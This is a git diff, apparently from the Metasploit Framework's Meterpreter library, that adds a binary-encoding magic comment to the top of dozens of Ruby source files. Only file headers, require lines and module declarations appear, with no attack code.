+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb
index 207929850e..9d642dbaac 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb
index 704b28698d..0c3d77215c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_wlanapi.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
index a35e0a3fcc..9da9a9c38e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb
index 0c4159cb57..ec4990551e 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb
index 3876e421f5..36f102e294 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb
index 04b1bcb1e8..3e62400638 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb
index fc8fe2ee74..ccae7ccabc 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb
index bfa7c982aa..cc12f9202d 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb
index 931babf0c7..22fced4270 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb
index 0d1e017a15..18bfdeb90b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb
index b971dbc203..5150a1381a 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb
index 94f5a2a8a6..d92d0433da 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/mock_magic.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
index d3f84e4c10..9aeeba59ca 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb
index 6809873635..36462c6b71 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Post
module Meterpreter
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb
index f23f10625a..39faa667a6 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..','..','..','..','..', '..', '..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
index 9a6bdbabf6..549cc8aa28 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb
index 48ba844768..d55b69df79 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb
index 215a0cc210..1cc1e33fa3 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb
index 4e7863fed6..f195c918bd 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/platform_util'
module Rex
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb
index 9945f844fa..cef4267ba4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..','..','..','..','..', '..', '..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb
index 00e7f8a3de..9e70fcba14 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/railgun/dll_helper'
module Rex
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb
index 99dde10650..06b42e9a78 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# Copyright (c) 2010, patrickHVE@googlemail.com
# All rights reserved.
#
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb
index 9d53452cee..de36574f45 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..','..','..','..','..', 'lib'))
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
index 1c99e6f808..61a9609e1f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/object_aliases'
require 'rex/post/meterpreter/extension'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
index 26aa60529c..cf80bdb19c 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
index 80f9a1e1de..a8c8ead6ff 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb
index 45ad8f7013..c25981f2b2 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
index 3850b3f840..001131651f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
index e0313e3850..e4a8832a61 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
index cd5b68b5da..d748005cb4 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb
index c4fc876250..dfb32d7ac1 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
index a127c566c4..e5920825b6 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
index ee7c8b8303..e0345c8230 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/client'
require 'rex/post/meterpreter/extensions/stdapi/constants'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
index 633dd218c2..a730df4c4b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/process'
require 'rex/post/meterpreter/packet'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
index 9430f6ed7d..9fd9866b21 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/constants'
require 'rex/post/meterpreter/extensions/stdapi/sys/registry'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
index 96850a389b..faa8cbd4c0 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/constants'
require 'rex/post/meterpreter/extensions/stdapi/sys/registry'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb
index fd7672bfcf..95cdfac56b 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/remote_registry_key.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/extensions/stdapi/constants'
require 'rex/post/meterpreter/extensions/stdapi/sys/registry'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
index fae12eedcc..1a244d3c2f 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/thread'
require 'rex/post/meterpreter/client'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
index 8872190955..8e75c73310 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
index 3b4947a6b0..7928ea9a86 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/ui'
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
index b7d74090ed..1a2d5cc478 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/inbound_packet_handler.rb b/lib/rex/post/meterpreter/inbound_packet_handler.rb
index 2eb8faae21..332afbbe1e 100644
--- a/lib/rex/post/meterpreter/inbound_packet_handler.rb
+++ b/lib/rex/post/meterpreter/inbound_packet_handler.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/object_aliases.rb b/lib/rex/post/meterpreter/object_aliases.rb
index 206c532e6b..4e40d27aff 100644
--- a/lib/rex/post/meterpreter/object_aliases.rb
+++ b/lib/rex/post/meterpreter/object_aliases.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 3b1cba013c..9dbcdc0c1e 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb
index 198baa5170..5b249ee2fa 100644
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/post/meterpreter/packet_response_waiter'
require 'rex/logging'
diff --git a/lib/rex/post/meterpreter/packet_parser.rb b/lib/rex/post/meterpreter/packet_parser.rb
index 6f4d778f84..911fd8d77f 100644
--- a/lib/rex/post/meterpreter/packet_parser.rb
+++ b/lib/rex/post/meterpreter/packet_parser.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
module Post
diff --git a/lib/rex/post/meterpreter/packet_response_waiter.rb b/lib/rex/post/meterpreter/packet_response_waiter.rb
index 9fbb48df51..4d0063fd40 100644
--- a/lib/rex/post/meterpreter/packet_response_waiter.rb
+++ b/lib/rex/post/meterpreter/packet_response_waiter.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'timeout'
require 'thread'
diff --git a/lib/rex/post/meterpreter/ui/console.rb b/lib/rex/post/meterpreter/ui/console.rb
index fe71ee01f6..6b3532886e 100644
--- a/lib/rex/post/meterpreter/ui/console.rb
+++ b/lib/rex/post/meterpreter/ui/console.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'rex/post/meterpreter'
require 'rex/logging'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb
index bd791d36cb..f0384e664d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/logging'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
index def9219ad1..4d811964f8 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
require 'rex/parser/arguments'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
index 92691f7b01..cd4a981d0c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
index c931291a79..d6e2827f13 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
index 070d95f4b3..8acec7a477 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
index a8255adae4..06a0f26f8c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
index 4ad9254f47..0af6bffc7d 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
index ba0d51980d..b8b7290a65 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
index 8df3a15448..d2a0af4449 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
index 56a34aec31..83f50d72ae 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb
index 38fb39d31d..686f96e36a 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
module Rex
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
index d8c91b1934..e209150b4c 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'tempfile'
require 'rex/post/meterpreter'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
index 5f13d037fa..2c5b360d0b 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/post/meterpreter'
require 'rex/service_manager'
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
index 9136463af1..138ea2eaab 100644
